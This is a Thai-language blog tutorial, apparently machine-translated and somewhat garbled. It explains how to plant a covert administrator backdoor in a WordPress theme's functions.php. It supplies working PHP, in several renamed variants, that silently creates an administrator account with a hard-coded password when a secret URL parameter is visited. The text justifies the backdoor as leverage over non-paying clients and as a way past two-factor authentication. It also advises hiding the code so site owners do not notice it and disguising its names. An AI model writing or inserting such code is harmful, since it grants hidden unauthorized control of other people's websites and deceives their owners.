วิธีสร้างผู้ดูแลระบบลับๆ ในการเข้าถึง WordPress

คุณเคยสร้างเว็บไซต์ WordPress หรือให้บริการแก่ลูกค้าของคุณแต่ไม่ได้รับเงินหรือไม่? ถ้าฟังดูคุ้นๆ แสดงว่าคุณมาถูกที่แล้ว

เพื่อป้องกันตัวเองจากสถานการณ์นี้ คุณอาจพบว่าการรู้วิธีสร้างการเข้าถึงเว็บไซต์ลับๆ ใน WordPress อาจเป็นประโยชน์

นอกจากนี้ ถ้าด้วยเหตุผลใดก็ตาม คุณไม่สามารถเข้าถึงเว็บไซต์ WordPress ของคุณได้ การมีทางเลือกอื่นในการเข้าถึงแบ็คดอร์เพื่อควบคุมอีกครั้งอาจมีประโยชน์มาก!

ในบทช่วยสอนนี้ ฉันจะพูดถึงการเข้าถึงเว็บไซต์ลับๆ ลับๆ และเหตุผลในการสร้างการเข้าถึงดังกล่าว เพื่อให้แน่ใจว่าคุณมีทางเข้าเว็บไซต์ของคุณเสมอ

สุดท้ายนี้ ผมจะแสดงให้คุณเห็นถึงวิธีการสร้างด้วยคำแนะนำทีละขั้นตอน ตามด้วยคำแนะนำด้านจริยธรรม

การเข้าถึงลับๆ ของผู้ดูแลระบบลับๆ ใน WordPress คืออะไร?

ตามคำกล่าวนี้ การเข้าถึงแบ็คดอร์เป็นวิธีให้ผู้ดูแลระบบกลับมาใช้เว็บไซต์ WordPress ได้อีกครั้ง หากการเข้าสู่ระบบตามปกติของคุณใช้ไม่ได้ผล

สงสัยว่าคุณจะสูญเสียบัญชีผู้ดูแลระบบของคุณได้อย่างไร

หากคุณเป็นนักพัฒนาหรือเอเจนซี่ WordPress คุณอาจพบว่าลูกค้าลบบัญชีผู้ดูแลระบบของคุณเมื่อคุณทำงานเสร็จเพื่อพยายามปกป้องเว็บไซต์เมื่อพวกเขาไม่จ่ายเงิน

ในกรณีที่เลวร้ายที่สุด แฮกเกอร์อาจเข้าถึงเว็บไซต์ของคุณโดยไม่ได้รับอนุญาตและเปลี่ยนรหัสผ่านของผู้ดูแลระบบหรือลบข้อมูลเข้าสู่ระบบทั้งหมด

หากเกิดเหตุการณ์นี้ คุณต้องมีวิธีในการเข้าถึงอีกครั้ง นั่นคือสิ่งที่ลับๆเข้ามาเล่น

อะไรคือเหตุผลพื้นฐานในการสร้างการเข้าถึงเว็บไซต์ลับๆ

มีเหตุผลสองสามประการในการสร้างการเข้าถึงผู้ดูแลระบบลับๆ เพื่อเข้าถึงเว็บไซต์ WordPress:

• เพื่อ รับสิทธิ์การเข้าถึง ของผู้ดูแลระบบอีกครั้งในกรณีที่ลูกค้าไม่ได้รับเงิน
• เพื่อ รักษาการ เข้าถึงหากเว็บไซต์ถูกแฮ็กและมีการเปลี่ยนแปลงรายละเอียดบัญชีผู้ดูแลระบบ
• เพื่อ ให้เข้าถึง แผงผู้ดูแลระบบได้ง่ายโดยไม่ต้องจำชื่อผู้ใช้หรือรหัสผ่าน
• เพื่อ เลี่ยงผ่านมาตรการรักษาความปลอดภัย ที่อาจมีอยู่ เช่น การรับรองความถูกต้องด้วยสองปัจจัย
• เพื่อ อนุญาตให้บุคคลอื่นเข้าถึง เว็บไซต์โดยไม่ทราบรหัสผ่านเดิมที่คุณใช้
• การสร้างการเข้าถึงผู้ดูแลระบบลับๆ แบบลับๆ จะเป็นประโยชน์ในสถานการณ์ที่ ยากหรือไม่สะดวกที่จะจำ ชื่อผู้ใช้หรือรหัสผ่าน

อย่างไรก็ตาม การสร้างแบ็คดอร์อาจเป็นความเสี่ยงด้านความปลอดภัย เนื่องจากเป็นการข้ามมาตรการรักษาความปลอดภัยใดๆ ที่อาจเกิดขึ้น

ดังนั้น ผมขอแนะนำให้ชั่งน้ำหนักข้อดีและข้อเสียก่อนที่จะสร้างการเข้าถึงผู้ดูแลระบบลับๆ ก่อนดำเนินการ

คำแนะนำด้านจริยธรรมในการสร้างการเข้าถึงเว็บไซต์ลับๆ

มีนัยทางจริยธรรมในการสร้างการเข้าถึงลับๆ เพื่อเข้าถึงเว็บไซต์ของบุคคลอื่น เป็นสิ่งที่ควรพิจารณาก่อนสร้าง

อย่างไรก็ตาม เหตุผลที่ถูกต้อง คุณกำลังยุ่งกับทรัพย์สินของคนอื่น (เมื่อพวกเขาจ่ายเงินไปแล้ว) ดังนั้นให้คิดเกี่ยวกับการแตกสาขาหากคุณวางแผนที่จะเพิ่มแบ็คดอร์

ฉันขอให้คุณอย่าเพิ่มแบ็คดอร์ลงในเว็บไซต์ เว้นแต่จะไม่มีทางเลือกอื่น ฉันไม่รับผิดชอบต่อการกระทำดังกล่าว ฉันขอแนะนำให้ใช้ด้วยเหตุผลที่ถูกต้องตามกฎหมายหรือทางกฎหมายเท่านั้น

แบ็คดอร์รหัสผ่าน WordPress ทำงานอย่างไร

แบ็คดอร์ WordPress ทำงานโดยใช้ PHP ภายในไฟล์ WordPress หลัก รหัสที่ฉันจะแชร์ในอีกสักครู่จะสร้างบัญชีผู้ดูแลระบบใหม่เมื่อคุณไปที่ URL ที่ระบุ

เมื่อสร้างเสร็จแล้ว คุณจะสามารถลงชื่อเข้าใช้เว็บไซต์ของคุณและทำงานอะไรก็ได้ที่คุณต้องการ

เมื่อคุณลงทะเบียนข้อมูลโค้ด PHP ใน functions.php คุณก็พร้อมที่จะเรียกใช้โดยใช้ URL ที่มีข้อความค้นหาที่กำหนดเอง URL ประกอบด้วยคำหลักที่คุณแทรกขณะแก้ไขไฟล์ functions.php

ตอนนี้ คุณอาจสงสัยว่าจะมีบัญชีลับอยู่ก่อนที่คุณจะเรียกใช้ฟังก์ชันนี้หรือไม่

คำตอบคือ “ไม่” บัญชีผู้ใช้ใหม่ของคุณจะถูกสร้างขึ้นเมื่อคุณเรียกใช้ฟังก์ชันโดยใช้ URL ที่มีพารามิเตอร์เฉพาะ

วิธีสร้างการเข้าถึงเว็บไซต์ลับๆ

กระบวนการต่อไปนี้เกี่ยวข้องกับการแก้ไขไฟล์ PHP ปลอดภัยอย่างสมบูรณ์ แต่คุณต้องแน่ใจว่าถูกต้องในครั้งแรก

ทำตามคำแนะนำเหล่านี้และคุณจะสบายดี!

เพื่อป้องกันปัญหาที่อาจเกิดขึ้น ฉันแนะนำให้แก้ไขไฟล์ functions.php ผ่านธีมลูกของคุณ หากคุณกำลังใช้ธีม Astra คุณสามารถสร้างธีมย่อยได้ด้วยการคลิกเพียงครั้งเดียว

ขั้นตอนที่ 1: เปิดไฟล์ functions.php จากตัวแก้ไขไฟล์ธีม

เราจะแก้ไขไฟล์ functions.php ซึ่งเป็นไฟล์หลักของ WordPress

• ไปที่แดชบอร์ดผู้ดูแลระบบ WordPress ของคุณ
• ไปที่ ลักษณะที่ ปรากฏ > ตัวแก้ไขไฟล์ธีม

• ตอนนี้ เลือกไฟล์ functions.php จากแถบด้านข้างขวา

ขั้นตอนที่ 2: คัดลอกและวางโค้ดต่อไปนี้ในไฟล์ functions.php

ตอนนี้ สิ่งที่คุณต้องทำคือคัดลอกและวางข้อมูลโค้ด PHP นี้ลงในตัวแก้ไข

 add_action( 'wp_head', 'my_backdoor' ); function my_backdoor() { if ( md5( $_GET['backdoor'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) { require( 'wp-includes/registration.php' ); if ( !username_exists( 'mr_admin' ) ) { $user_id = wp_create_user( 'mr_admin', 'pa55w0rd!' ); $user = new WP_User( $user_id ); $user->set_role( 'administrator' ); } } }

คุณจะเห็นจากรหัสว่าจะสร้างผู้ดูแลระบบใหม่ชื่อ ' mr_admin ' โดยใช้รหัสผ่าน ' pa55w0rd! '.

คุณสามารถเปลี่ยนสิ่งเหล่านี้ได้ตามที่เห็นสมควร

• วางโค้ดที่ใดก็ได้ภายในไฟล์ PHP ตามหลักการแล้วระหว่างฟังก์ชันอื่นๆ คุณไม่ต้องการให้ผู้ดูแลไซต์หรือผู้จัดการทราบว่าคุณกำลังใส่รหัสนี้ใช่ไหม ฉันกำลังวางลงในส่วนล่างตรงกลางของเอกสาร
• นอกจากนี้ อย่าลืมวางโค้ดเหนือ /** หรือต่อจากเครื่องหมาย */ ทันที

• กดปุ่ม " อัปเดตไฟล์ "

ตอนนี้ ไฟล์ควรได้รับการอัปเดตและแบ็คดอร์ของคุณก็พร้อมใช้งาน

ขั้นตอนที่ 3: สร้าง URL ด้วยพารามิเตอร์ที่กำหนดเองเพื่อรับสิทธิ์การเข้าถึงระดับผู้ดูแลระบบ

เมื่อคุณต้องการเรียกใช้ฟังก์ชันนั้นหรือพยายามเข้าถึงระดับผู้ดูแลระบบ ตรวจสอบให้แน่ใจว่าคุณได้เพิ่มกระสุนต่อไปนี้ที่ด้านขวาของโดเมน:

“ /?ประตูหลัง=ไป ”

[ในที่นี้ แบ็คดอ ร์คือ พารามิเตอร์การค้นหา หลังคีย์เวิร์ด GET ] เพื่อให้เฉพาะเจาะจงมากขึ้น ให้ดูภาพหน้าจอต่อไปนี้:

ดังนั้น หากเว็บไซต์ของคุณคือ www.xyz.com URL การเข้าถึงแบ็คดอร์จะเป็น “ www.xyz.com/?backdoor=go ”

หลังจากเพิ่มกระสุนข้างชื่อโดเมนแล้ว ให้กด Enter

แบม! มันง่ายอย่างนั้น!

ตอนนี้ ตรวจสอบบัญชีผู้ใช้ผู้ดูแลระบบใหม่ของคุณจาก ผู้ใช้ > ผู้ใช้ทั้งหมด

เคล็ดลับสำหรับมือโปร: ลับๆล่อๆ และอำพรางประตูหลัง

เคล็ดลับ 1: การเปลี่ยนพารามิเตอร์และชื่อฟังก์ชัน

คุณสามารถเปลี่ยนชื่อฟังก์ชัน พารามิเตอร์ของข้อมูลโค้ดได้ตามต้องการ

ด้วยวิธีนี้ คุณสามารถปลอมตัวด้วยลายพรางได้ นี่คือข้อมูลโค้ดลายพรางที่ฉันเปลี่ยนคำหลัก " backdoor " เป็น " pathway ":

 add_action( 'wp_head', 'my_pathway' ); function my_pathway() { if ( md5( $_GET['pathway'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) { require( 'wp-includes/registration.php' ); if ( !username_exists( 'mr_admin' ) ) { $user_id = wp_create_user( 'mr_admin', 'pa55w0rd!' ); $user = new WP_User( $user_id ); $user->set_role( 'administrator' ); } } }

นี่จะหมายถึง URL ของ www.xyz.com จะกลายเป็น “ www.xyz.com/?pathway=go ”

เคล็ดลับ 2: เปลี่ยนชื่อผู้ใช้

หากต้องการเปลี่ยนชื่อผู้ใช้ ให้แทนที่สตริง “ mr_admin ” ด้วย “ hellboy ”

 add_action( 'wp_head', 'my_pathway' ); function my_pathway() { if ( md5( $_GET['pathway'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) { require( 'wp-includes/registration.php' ); if ( !username_exists( 'hellboy' ) ) { $user_id = wp_create_user( 'hellboy', 'pa55w0rd!' ); $user = new WP_User( $user_id ); $user->set_role( 'administrator' ); } } }

เคล็ดลับ 3: การเปลี่ยนรหัสผ่าน

หากต้องการเปลี่ยนรหัสผ่าน ให้แทนที่คีย์เวิร์ด “ pa55w0rd! ” กับ “ hell_pass! ”

 add_action( 'wp_head', 'my_pathway' ); function my_pathway() { if ( md5( $_GET['pathway'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) { require( 'wp-includes/registration.php' ); if ( !username_exists( 'hellboy' ) ) { $user_id = wp_create_user( 'hellboy', 'hell_pass!' ); $user = new WP_User( $user_id ); $user->set_role( 'administrator' ); } } }

เคล็ดลับ 4: การสร้าง URL และกระสุนใหม่

ดังนั้น เพื่อเรียกฟังก์ชัน คุณต้องใช้ URL ต่อไปนี้กับคำหลัก " เส้นทาง ":

www.xyz.com/?pathway=go

และนั่นแหล่ะ ตอนนี้คุณได้สร้างแบ็คดอร์และฝึกฝนการปรับแต่งการตั้งค่าเพื่อให้มีเอกลักษณ์เฉพาะตัว!

ตอนนี้ถึงตาคุณแล้ว!

จำไว้ว่าไม่ควรเพิ่มการเข้าถึงเว็บไซต์ลับๆ แต่ถ้าจำเป็นต้องทำ ตอนนี้คุณรู้แล้วว่าต้องทำอย่างไร

ไม่ว่าเหตุใดคุณอาจต้องเข้าถึงเว็บไซต์ได้อีกครั้ง นี่เป็นวิธีที่ง่ายที่สุดวิธีหนึ่ง

หากคุณติดอยู่กับขั้นตอนใด ๆ เหล่านี้ โปรดอย่าลังเลที่จะติดต่อเราในส่วนความคิดเห็นด้านล่าง

คุณสามารถเข้าร่วมชุมชน Facebook ของฉันเพื่อติดตามข่าวสารล่าสุดของฉันได้!